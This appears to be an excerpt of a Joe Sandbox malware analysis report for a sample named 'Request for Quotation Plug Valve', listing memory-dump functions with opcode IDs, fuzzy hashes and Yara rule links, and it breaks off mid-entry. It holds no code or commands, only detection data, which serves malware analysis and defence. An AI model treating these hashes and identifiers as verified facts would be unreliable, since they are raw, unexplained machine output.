Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e196b074188cc8859e8f5efe5de3e04b799097cb8abbb7d8431653de8558396
Instruction ID: 13b3185e7bce852f1cfe2a2a8668de38df7fd116bef755fbbd58113c9fd1205e
Opcode Fuzzy Hash: 0e196b074188cc8859e8f5efe5de3e04b799097cb8abbb7d8431653de8558396
Instruction Fuzzy Hash: 8FD0C2311096505BC317E22CAC008CB7F666DC2300350565AF00487A11CA945E0582E1

Function 02AB28AB Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b484eb3537d37d4a1d9cd7681343b7db6dbc21b431b0e8733585d82b9a151e6d
Instruction ID: 892f10be61a64a328cce13cd92ad2cc45f5e7456089f179e263d5f3d02164c73
Opcode Fuzzy Hash: b484eb3537d37d4a1d9cd7681343b7db6dbc21b431b0e8733585d82b9a151e6d
Instruction Fuzzy Hash: 0CE0C232D2122B978B00E6A1EC004DFB738EE81220B844222E91033140EB702658C6A0

Function 02AB28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61063065c8b271cf1228de443a778d639422f1f2ee151555fddecd9d7d5950b
Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
Opcode Fuzzy Hash: d61063065c8b271cf1228de443a778d639422f1f2ee151555fddecd9d7d5950b
Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0

Function 02AB6739 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ebad02803087ebba73c593a24610f71deebdcf726474144ed198cdb074031
Instruction ID: 4c1976fd78c830522d3c7b80f13afde3c447d42d9ac3e8d0f21f5d3bacf2b949
Opcode Fuzzy Hash: 1a9ebad02803087ebba73c593a24610f71deebdcf726474144ed198cdb074031
Instruction Fuzzy Hash: 88D05B3111835A89E709A378A8467693F75A7C4134F449554E1450994DDFE818454751

Function 02ABAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f86936d844d361f0181b58d8ce413ca51dac820445b1b055f7ddb9e6abcd5c99
Instruction ID: de8e3d8f96a50186ce921aed62ef77527dac6f7be73cb0b606dc996b1cecc082
Opcode Fuzzy Hash: f86936d844d361f0181b58d8ce413ca51dac820445b1b055f7ddb9e6abcd5c99
Instruction Fuzzy Hash: 82D0673AB101089FDB049F98E8409DDF7B6FB98221B048126F915A3260C6319965DB50

Function 02AB6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38dcff9c46e1a47f314ae2e2eac8d6cd9b060653649449c2ab02f50799d92c41
Instruction ID: 51fb6da37fef1a3a912a0b78b89c6a7ae61262ae797d588fb522648605332253
Opcode Fuzzy Hash: 38dcff9c46e1a47f314ae2e2eac8d6cd9b060653649449c2ab02f50799d92c41
Instruction Fuzzy Hash: 4FC0123011431E8AD50DF779ED4561A3BAAE6D0218B40A528A1151A94DDFF81C454690

Function 02AB98F0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0bedfdda3c81674c146dad6eb2f3375c5c169022f4c118fcfa8246b168dacc
Instruction ID: 3c9d791c0ef3f3a833f8a9ccf422a2cb8c847d69bc67a7f029d419465e1e1739
Opcode Fuzzy Hash: cf0bedfdda3c81674c146dad6eb2f3375c5c169022f4c118fcfa8246b168dacc
Instruction Fuzzy Hash: 70C092212250D00EEA82A3A07AD53EDBF285B8D233F69E1A2E8C484E8388685847C200

Non-executed Functions

Function 068E8BA0 Relevance: 1.6, Strings: 1, Instructions: 367COMMON

Download Yara Rule

Strings

", xrefs: 068E90BE

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 7cedcc4cc0b929cf638eeb99be6c123eb6b89e14997292939783bb4152375efc
Instruction ID: 2a3084cc6e0722f271b6d9f186591784cac48edb4a4a9e2585d08751421a45b7
Opcode Fuzzy Hash: 7cedcc4cc0b929cf638eeb99be6c123eb6b89e14997292939783bb4152375efc
Instruction Fuzzy Hash: 81F136B4E002588FEB14CFA9D48479EFBB2BF85314F24C269D448AB395D7B49986CF50

Function 02AB29E0 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83fddfb128531bf18806f49553fd657f0e516a80c86e93a86c91c1963f77efa6
Instruction ID: c01fc8e9b3fcc399da0f413ddb6800d840ef8a6412094f137594075e2b647fe1
Opcode Fuzzy Hash: 83fddfb128531bf18806f49553fd657f0e516a80c86e93a86c91c1963f77efa6
Instruction Fuzzy Hash: 4A22E5219096C15BEB174B7CC4ABBEBBFF09F8B114B1944DEC9D24E20FDA259506CB42

Function 068E0040 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bf6965b8dba34f1122f095a1075b7e02e0a14a510d6be48f1ea005b71bf327
Instruction ID: 6bbed3e6303a0b718309395c6ad7e3f331dfd549949f25a7b397af6441e97d63
Opcode Fuzzy Hash: 34bf6965b8dba34f1122f095a1075b7e02e0a14a510d6be48f1ea005b71bf327
Instruction Fuzzy Hash: 9652BA74E01228CFDB64DF69C984B9EBBB2BF89304F1085EAD409A7255DB709E81CF50

Function 02AB3E09 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30a32df4a36965d02aaabccdad95131f3a9ed646bdda213550c22db3dbdd0fab
Instruction ID: 8c94657a4ba13736e673763fe438dcfda5e0740338564558115728e061fc13ba
Opcode Fuzzy Hash: 30a32df4a36965d02aaabccdad95131f3a9ed646bdda213550c22db3dbdd0fab
Instruction Fuzzy Hash: 8FA1B574B08259DBDB199B78D4642BEBBF7AFCC710B08856DD542E728ACE34C842C791

Function 02ABF631 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bc1aaf91716bedd98044ef80369286d3ac4737d8b371ee63274ad953e67e3d1
Instruction ID: 5cfc213e73f56a40be078f5e84b6eedf2466662f206d762697cc39a9845de35a
Opcode Fuzzy Hash: 3bc1aaf91716bedd98044ef80369286d3ac4737d8b371ee63274ad953e67e3d1
Instruction Fuzzy Hash: EAC1C274E01218CFEB55DFA9C994B9DBBB2BF89300F2480A9D409AB359DB355E81CF50

Function 02ABFA88 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4707543460.0000000002AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2ab0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a62b05cbdf3b5ef40d0c09dedfc6029ac008c96de5746ba8d31768e1a2b28e8
Instruction ID: 36584095f7b4022ff0288e6e58e34679bfd1b23c180107ae960c4db182d711da
Opcode Fuzzy Hash: 9a62b05cbdf3b5ef40d0c09dedfc6029ac008c96de5746ba8d31768e1a2b28e8
Instruction Fuzzy Hash: CAC1C278E01218CFDB55DFA9C984BADBBB2BF89300F2481A9D409AB355DB355E85CF10

Function 068EE6B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a1a73c2dcda2bbbebc412ae9b31b4ef20ac4a6528bfdb9074d626186a1b75c4
Instruction ID: d42c79208106b442045f27d5694a22dc8be7d9139b7cfcb151fd1077b708e7fa
Opcode Fuzzy Hash: 6a1a73c2dcda2bbbebc412ae9b31b4ef20ac4a6528bfdb9074d626186a1b75c4
Instruction Fuzzy Hash: EBC1B274E01218CFEB54DFA9C984BADBBB2BF89300F1081A9D419AB355DB359E85CF50

Function 068EDE00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd70438fb9bac555f867ff4552e6bf6e44707e95e6597f6c1aab97b62384bab
Instruction ID: 0f083afd817cbe468e82baeb89a499969ca0e905ac06c23110e6dfa6a0510d6f
Opcode Fuzzy Hash: 6cd70438fb9bac555f867ff4552e6bf6e44707e95e6597f6c1aab97b62384bab
Instruction Fuzzy Hash: ACC1C274E01218CFEB54DFA9C984B9DBBB2BF89300F1081A9D419AB355DB759E81CF50

Function 068EE258 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3dc236f7d1fce7a531b9a8088a673328adb9ce5082ef262ddcfd9e5196e4a9f
Instruction ID: bbd38cf30caf500a5b692eb0cc5eec32fafb2633dd965495f08f4ff2cfad8439
Opcode Fuzzy Hash: c3dc236f7d1fce7a531b9a8088a673328adb9ce5082ef262ddcfd9e5196e4a9f
Instruction Fuzzy Hash: 14C1C278E01218CFEB54DFA9C984B9DBBB2BF89304F1080A9D419AB355DB359E81CF50

Function 068EF3B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51fcdac24abd7f7b78f116225b37502b50a1c35a973a4056cb7ad943999c6f69
Instruction ID: cc1f1a9bcce0a3b8d10df8ee06b00da923fc0380d82f88b52e983486b6d7ceb9
Opcode Fuzzy Hash: 51fcdac24abd7f7b78f116225b37502b50a1c35a973a4056cb7ad943999c6f69
Instruction Fuzzy Hash: 25C1B378E01218CFEB54DFA9C984B9DBBB2BF89304F1080A9D519AB355DB359E81CF50

Function 068EEB08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bfa3dae296c9eceed7a295a9e44e877774467d5f877a0fe91382cea704ebfb1
Instruction ID: 32c9f8685e995f7833ed402ca5d42452e14b389fe376aa00e5ad834801c9d162
Opcode Fuzzy Hash: 3bfa3dae296c9eceed7a295a9e44e877774467d5f877a0fe91382cea704ebfb1
Instruction Fuzzy Hash: 3BC1B278E01218CFEB54DFA9C984B9DBBB2BF89300F1081A9D419AB355DB759E81CF50

Function 068EEF60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 415bf5a7a59aa114b4e599fe41c8042542db201e88a79fe3de9bdee8d48d74ee
Instruction ID: 9cd6e1a6c7af0577157b6b07aaa79e6aa8dcf5d56c6096440d3813b7e9dd6c46
Opcode Fuzzy Hash: 415bf5a7a59aa114b4e599fe41c8042542db201e88a79fe3de9bdee8d48d74ee
Instruction Fuzzy Hash: E9C1B278E01218CFEB54DFA9C984B9DBBB2BF89300F1081A9D419AB355DB359E81CF50

Function 068ECCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9330f231dfc1f1b0f19bb61d89ae7f34fd7334a2fb8d6a47d5a0477f3d24b8b
Instruction ID: 0691ea5faedac3689a8320c7a4f311c20b696a56cf4dda90250519c1967da2ba
Opcode Fuzzy Hash: e9330f231dfc1f1b0f19bb61d89ae7f34fd7334a2fb8d6a47d5a0477f3d24b8b
Instruction Fuzzy Hash: 57C1C278E01218CFEB54DFA9C984B9DBBB2BF89300F1080A9D419AB355DB759E85CF50

Function 068ED0F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8876af06761eb6e9b54d29cc2ec52c0427b6bd3ad3072a71176ab6a82511c261
Instruction ID: f539119f288bfd71edd0f806d67d141e80418bcee0d7aea97dff79ebb23d77de
Opcode Fuzzy Hash: 8876af06761eb6e9b54d29cc2ec52c0427b6bd3ad3072a71176ab6a82511c261
Instruction Fuzzy Hash: 59C1C274E01218CFEB54DFA9C984B9DBBB2BF89304F1080A9D419AB355DB359E85CF50

Function 068EF810 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5600effd47958e2f9b1e45406b34e2481d9b01acf058e12b441b2e01e6b0e9
Instruction ID: 6c97636c8dd475e32b0e10202a3523b23ac18d2c84eda2a2cbdaa883463653f7
Opcode Fuzzy Hash: 2a5600effd47958e2f9b1e45406b34e2481d9b01acf058e12b441b2e01e6b0e9
Instruction Fuzzy Hash: 41C1C374E01218CFEB54DFA9C984B9DBBB2BF89300F2081A9D819AB355DB355E81CF50

Function 068ED9A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0310546946b863d6d6995a769fc009efcfa385ae2f68f934585cc687e54680d2
Instruction ID: 681162d5945653734112ba25677fe1b2c99c85dd03149be6960d2ce05646bfb3
Opcode Fuzzy Hash: 0310546946b863d6d6995a769fc009efcfa385ae2f68f934585cc687e54680d2
Instruction Fuzzy Hash: A3C1C278E01218CFEB54DFA9C984B9DBBB2BF89300F1081A9D409AB355DB759E85CF50

Function 068ED550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f84a777d5ae0469cb5afd386a5683d18a3e80184c3cbf619773abc34ced99c
Instruction ID: 6f5d1fb136fb1689bf566ae3ca431423a8b04aa1fbd9d9248929434205df7734
Opcode Fuzzy Hash: 36f84a777d5ae0469cb5afd386a5683d18a3e80184c3cbf619773abc34ced99c
Instruction Fuzzy Hash: 4DC1B178E01218CFEB54DFA9C994B9DBBB2BF89300F1080A9D419AB355DB359E85CF50

Function 068E9328 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4179a1d1025c72139f62ad65f9ac71c247072850e93e1d0d200e5677d4fe279
Instruction ID: ab9b8265c20da7013b069d7583050744b56c9a9ae14ea702619cecc11eb49170
Opcode Fuzzy Hash: f4179a1d1025c72139f62ad65f9ac71c247072850e93e1d0d200e5677d4fe279
Instruction Fuzzy Hash: FA91D271E006188BDF68DFBAC9442ADBAF3AFC9314F10852AD425E7395DB708D02CB90

Function 068E5018 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b809be141530fc313792e8f099380d462316b3586c70413a1c860c2dbdb97b34
Instruction ID: 96c998fb7a59c8fabf3596394c64fafd1a62b3b531ad02a89939221abb797de0
Opcode Fuzzy Hash: b809be141530fc313792e8f099380d462316b3586c70413a1c860c2dbdb97b34
Instruction Fuzzy Hash: 30A10571D106598FDB14DFA9C8447DDFBB1EF8A304F14C2AAE458A7260EB709A85CF81

Function 068EFC68 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b98f6ddd101e94d951ed19f2b51f65595cc25e39d85041a74a7cc736dffdefd
Instruction ID: 21dbf528599c0169a0ac178d81c08d12a6d87f0c6e41d85961c1e2b4e8ae00a2
Opcode Fuzzy Hash: 8b98f6ddd101e94d951ed19f2b51f65595cc25e39d85041a74a7cc736dffdefd
Instruction Fuzzy Hash: CB81B074E01218CFEB59DFE9D980BADBBB2BF89300F208129D815AB359DB755942CF50

Function 068E0006 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cc318d5ec2c4bc6678325f80fd9a999e9592ec98c965dfa0cb2b570c9603679
Instruction ID: 022c18c231a86989dc7023b825ed674ae874e160963f4b0b603e49cf0efee916
Opcode Fuzzy Hash: 2cc318d5ec2c4bc6678325f80fd9a999e9592ec98c965dfa0cb2b570c9603679
Instruction Fuzzy Hash: A171F674D01259CFDB29DFA6D940BADBBB2FF89304F1080A9C848A765ADB315D85DF40

Function 068E8B90 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f69f9efca7fd15c42106b918202e5208c155261cc1e94cf8e32bff93e4b67c20
Instruction ID: d29b6bc1e959c25cebb16ed7fc9512554f808ed9207bfc73ba28bb381d98f1b5
Opcode Fuzzy Hash: f69f9efca7fd15c42106b918202e5208c155261cc1e94cf8e32bff93e4b67c20
Instruction Fuzzy Hash: A74108B1D016589BEB18CFAAD8843CEFBF2BF89314F14C12AD418AB294DBB44585CF50

Function 068ED999 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbadb36a9422e1d282335755785844053273f0e5ef80d2b1360202dbfda9e222
Instruction ID: 5495771e7093eab89dfe4d48026112c6c2a5e4e07a403be1af3e270480d5945c
Opcode Fuzzy Hash: dbadb36a9422e1d282335755785844053273f0e5ef80d2b1360202dbfda9e222
Instruction Fuzzy Hash: 28414774E012488FDB58DFBAC95079DBBF2AF8A300F14C12AC514AB259DB34594ACF00

Function 068EF3A8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f1c299ac391c08d5eeeaec40eec9ee3d1d54ff5dd7a66c4dba093b991ea3ef
Instruction ID: 1ef0395675f5c16a5e229a842ca9adc39a23c137568632a0ca8754ff0407ff25
Opcode Fuzzy Hash: 22f1c299ac391c08d5eeeaec40eec9ee3d1d54ff5dd7a66c4dba093b991ea3ef
Instruction Fuzzy Hash: 3541F575E01248CBEB58DFAAD94079EFBF2AF89304F20C12AC415BB258DB345946CF40

Function 068ECC8F Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610e83e6198170e1e52ddb5fe95732c5965c8f7aa2b4b5b847f758cdf0fb45bc
Instruction ID: abeed9586fcbd968d6e0f92848344b406e43c76578a75f675b6da0e851fc018b
Opcode Fuzzy Hash: 610e83e6198170e1e52ddb5fe95732c5965c8f7aa2b4b5b847f758cdf0fb45bc
Instruction Fuzzy Hash: 7D41B574E012488BDB58DFAAD9447DEFBB2AF89300F24D129C415BB254DB355946CF50

Function 068EE24A Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f22d564f482cc345498398be5a13066236c680e07123e29c5027798503baf6e
Instruction ID: 976898881e56cdc6d4d83733a674c40e8b5d2edaaecab2d4612e2d9e3dca6527
Opcode Fuzzy Hash: 1f22d564f482cc345498398be5a13066236c680e07123e29c5027798503baf6e
Instruction Fuzzy Hash: F341E474E01248CBEB58DFAAD95469DFBF2BF8A300F24C129C525BB268DB345946CF50

Function 068EF802 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 591da21b9234db1aa86253a9c325dac309501e6be9e9442f972bd50620a10734
Instruction ID: 1496a0ff4f5c2e38bae7bff0f0d5389f3c165304042b574ed30b94d818735433
Opcode Fuzzy Hash: 591da21b9234db1aa86253a9c325dac309501e6be9e9442f972bd50620a10734
Instruction Fuzzy Hash: 2B41E474E012488BEB58DFAAD94079DFBF2BF89300F20D129C515BB268DB345946CF40

Function 068EDDF2 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c4e841454fcfdb77b2fb04ec2e8dfe3cbc857e844cfb44fc48aa7de5e3d44c4
Instruction ID: 01ca04c9debabe37610f6c7e23cde93c09678052c9832aac43213d63e448c3c8
Opcode Fuzzy Hash: 1c4e841454fcfdb77b2fb04ec2e8dfe3cbc857e844cfb44fc48aa7de5e3d44c4
Instruction Fuzzy Hash: BF41E2B5E012488BEB58DFAAD95479DFBB2AF8A300F20C12AC415BB258DB345946CF50

Function 068EEF51 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50917953df3f66e3de96bcec2d2e2f4ed336c79e6d7d68c2606da6910dca3a0d
Instruction ID: dfbc84bfe9fc2bda4c83bb334e6e9ee075ff3333b75772e057dbe3ea0554bef3
Opcode Fuzzy Hash: 50917953df3f66e3de96bcec2d2e2f4ed336c79e6d7d68c2606da6910dca3a0d
Instruction Fuzzy Hash: E441F574E01248CBEB58DFAAD9506DDFBF2AF8A300F24C169C415AB258DB345946CF40

Function 068EEAF8 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebae6991f1ec191c2a26c59b0614c4faa11e7031136243b81c1a121bf7c5b71d
Instruction ID: 3ca20b96911569ac5869dcacb249296bb9715646eb50a17f1ff11fd9742d38b6
